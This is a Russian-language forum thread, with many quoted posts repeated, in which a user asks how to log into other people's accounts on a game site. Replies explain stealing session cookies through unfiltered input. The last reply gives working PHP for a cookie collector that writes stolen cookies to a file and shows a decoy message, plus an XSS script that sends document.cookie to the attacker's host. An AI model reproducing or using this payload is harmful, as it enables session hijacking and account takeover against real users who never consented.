Свободное общение | метод post
Тема закрыта by
lotos3
lotos3
Вот говорят, что если просто писать типа:
$login = $_post['login'];
$pass = $_post['pass'];
То можно зайти под любым логином, даже под амином, мне интерестно как это делаеться?
Что куда нужно писать или еще чтото!
$login = $_post['login'];
$pass = $_post['pass'];
То можно зайти под любым логином, даже под амином, мне интерестно как это делаеться?
Что куда нужно писать или еще чтото!
Cezarionis , а именно как это можно зделать?
Вот я хочу проверить какую то игру на дыры и войти под чужим логином!
Вот я хочу проверить какую то игру на дыры и войти под чужим логином!
lotos3 (12.01.2019 в 14:51)
Cezarionis , а именно как это можно зделать?
Вот я хочу проверить какую то игру на дыры и войти под чужим логином!
Cezarionis , а именно как это можно зделать?
Вот я хочу проверить какую то игру на дыры и войти под чужим логином!
Вставить в поле переадресацию на свой сайт, а в гет передать куки.
вот и все.
код показывать не буду, нет желаниЯ
________
посл. ред. 12.01.2019 в 14:55; всего 1 раз(а); by Cezarionis
lotos3 , Нужно украсть куки, в данном примере не фильтруются данные на вход. Что бы украсть куки, нужно искать другую форму отправки без фильтрации. Пишем JS код, кидаем жертве, получаем куки и заходим.
Cezarionis , сколько лажу по форумам и гуглю, но нигде не написано это, как вообще можно узнать как это делать, видео или мануал!?
Cezarionis , Через логин все равно не сделаешь, нужна другая форма, где бы был авторетизирован пользователь.
lotos3 (12.01.2019 в 14:57)
Cezarionis , сколько лажу по форумам и гуглю, но нигде не написано это, как вообще можно узнать как это делать, видео или мануал!?
Cezarionis , сколько лажу по форумам и гуглю, но нигде не написано это, как вообще можно узнать как это делать, видео или мануал!?
Долазишься до срока. В гугле такое лучше сейчас не искать.
lotos3 (12.01.2019 в 14:57)
Cezarionis , сколько лажу по форумам и гуглю, но нигде не написано это, как вообще можно узнать как это делать, видео или мануал!?
Cezarionis , сколько лажу по форумам и гуглю, но нигде не написано это, как вообще можно узнать как это делать, видео или мануал!?
https://habr.com/post/66057/
Four lotos3 (12.01.2019 в 14:47)
Вот говорят, что если просто писать типа:
$login = $_post['login'];
$pass = $_post['pass'];
То можно зайти под любым логином, даже под амином, мне интерестно как это делаеться?
Что куда нужно писать или еще чтото!
Вот говорят, что если просто писать типа:
$login = $_post['login'];
$pass = $_post['pass'];
То можно зайти под любым логином, даже под амином, мне интерестно как это делаеться?
Что куда нужно писать или еще чтото!
создаём на хостинге collect_cookie.php
вставить туда вот это:
<?php
$Cookie= $_GET['cookie'];
$date=date("l ds of F Y h:i:s A");
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('stolen_cookie.txt','a');
fwrite($file,"DATE:$date || USER AGENT:
$user_agent || COOKIE: $Cookie n");
fclose($file);
echo '<b>Извините, сайт находится в состоянии разработки. </b></br></br>Пожалуйста, нажмите<a
href="http://mrvoin.ru/">здесь</a>, чтобы перейти на предыдущую страницу';
?> и создать там же на хостинге stolen_cookie.txt
далее код который ниже
<script>document.location="http://адрес вашего сайта/collect_cookie.php? cookie="+escape(document.cookie);</script>
вставляем в уязвимое поле на уязвимом сайте и нажимаем кнопку отправки.
Стр.: 1, 2